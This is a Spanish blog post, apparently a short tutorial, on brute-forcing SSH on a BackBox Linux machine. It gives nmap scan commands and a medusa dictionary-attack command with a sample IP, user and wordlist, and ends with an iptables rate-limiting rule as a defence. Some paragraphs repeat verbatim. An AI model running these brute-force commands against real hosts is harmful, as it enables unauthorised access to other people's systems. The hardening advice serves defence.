Hoy tome la decisión de mostrar la seguridad de algunas distros
de LINUX dedicadas para el mundo de la seguridad.
Y me topé con backdox algunos puertos abiertos y si eres de esos “humanos” que esta pensando en cambiarte a backbox o dejar KALI LINUX, ahora vengo a mostrarte como pueden atacarte en backbox.
De seguro me preguntarás. Hey Cread! puedes editarlo, claro que podemos asegurarlo pero que pasa si ejecutamos iptables en backbox
Tenemos algunas configuraciones en iptables pero ninguna protección para ssh.
Para saber los puertos que posee abierto te invito a que vos lo escanees.
Tengo mis dos sistemas actualizados y la versión de “NMAP” no me convence. Y tenemos nuestro resultado. 22 y 111 abierto.
Atacaremos SSH con lo siguientes comandos.
ssh IP contraseña y juega.
Pronto publicare un vídeo.
Y me topé con backdox algunos puertos abiertos y si eres de esos “humanos” que esta pensando en cambiarte a backbox o dejar KALI LINUX, ahora vengo a mostrarte como pueden atacarte en backbox.
¿Qué es SSH?
SSH, también conocido como Secure Socket Shell, es un protocolo de red que proporciona a los administradores una manera segura para acceder a un ordenador remoto. SSH también se refiere al conjunto de utilidades que implementan el protocolo. Secure Shell proporciona autenticación fuerte y asegurar las comunicaciones de datos cifrados entre dos equipos que se conectan a través de una red insegura como Internet. SSH es ampliamente utilizado por los administradores de red para la gestión de sistemas y aplicaciones de forma remota, lo que les permite iniciar sesión en otro ordenador a través de una red, ejecutar comandos y mover archivos de un ordenador a otro.De seguro me preguntarás. Hey Cread! puedes editarlo, claro que podemos asegurarlo pero que pasa si ejecutamos iptables en backbox
Tenemos algunas configuraciones en iptables pero ninguna protección para ssh.
ATAQUE
Como atacar a BACKBOX en modo fuerza bruta. Antes de empezar vamos a crearnos un buen diccionario. Pincha aquí para leer de eso.Para saber los puertos que posee abierto te invito a que vos lo escanees.
nmap -sV ip
nmap -Pn ipAhora observa las dos imágenes.
Tengo mis dos sistemas actualizados y la versión de “NMAP” no me convence. Y tenemos nuestro resultado. 22 y 111 abierto.
Atacaremos SSH con lo siguientes comandos.
medusa -h Dirección IP -P (DICCIONARIO) -u nombre de usuario -M ssh
medusa -h 192.168.1.10 -P /root/Desktop/password.lst -u creadpag -M ssh
Listo. Ahora solo tienes que ingresar.
ssh IP contraseña y juega.
Para evitar estos tiempos de ataques.
iptables -I INPUT -p tcp –dport 22 -i tarjeta_interfaz_red -m state –state NEW -m recent –set iptables -I INPUT -p tcp –dport 22 -i tarjeta_interfaz_red -m state –state NEW -m recent –update –seconds 40 –hitcount 3 -j DROP Espero haberte ayudado. Y no te olvides en compartirlo y recuerda KALI LINUX es unos de los mejores y si estas pensando en cambiarlo te estaré observando. Gracias.Pronto publicare un vídeo.
0 Comentarios